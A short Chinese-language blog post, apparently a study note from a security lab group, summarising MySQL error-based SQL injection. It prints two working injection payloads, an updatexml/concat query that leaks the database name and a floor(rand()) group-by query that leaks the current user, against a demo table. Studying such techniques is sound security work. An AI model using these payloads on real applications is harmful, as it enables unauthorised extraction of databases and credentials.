QQ love member No. 3 seed player

know it then do it && APT086&QQ愛安全实验室成员

MySQL报错注入小结

07 Aug 2019 » 习信息安全系列

[TOC]

mysql> select * from users order by 3;
+----+-------------+---------+---------+------+--------+
| id | name        | chinese | english | math | Strong |
+----+-------------+---------+---------+------+--------+
|  6 | ZhangJinbao |      55 |      85 |   45 |     10 |
|  2 | LiJin       |      67 |      53 |   95 |     10 |
|  7 | HuangRong   |      75 |      65 |   30 |     10 |
|  5 | LiLaicai    |      82 |      84 |   67 |     10 |
|  3 | WangWu      |      87 |      78 |   77 |     10 |
|  4 | LiYi        |      88 |      98 |   92 |     10 |
|  1 | XiaoMing    |      89 |      78 |   90 |     10 |
+----+-------------+---------+---------+------+--------+
7 rows in set (0.00 sec)

updatexml 报错注入

select * from users where id=1 and (updatexml(1,concat(0x3a,(select database())),1));

解释:

语法:UPDATEXML (XML_document, XPath_string, new_value);

第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc

第二个参数:XPath_string (Xpath格式的字符串)

第三个参数:new_value,String格式,替换查找到的符合条件的数据

作用:改变文档中符合条件的节点的值。

floor 报错注入

select * from users where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

其他参考


「 转载请声明博客地址及APT086&QQ愛安全实验室 」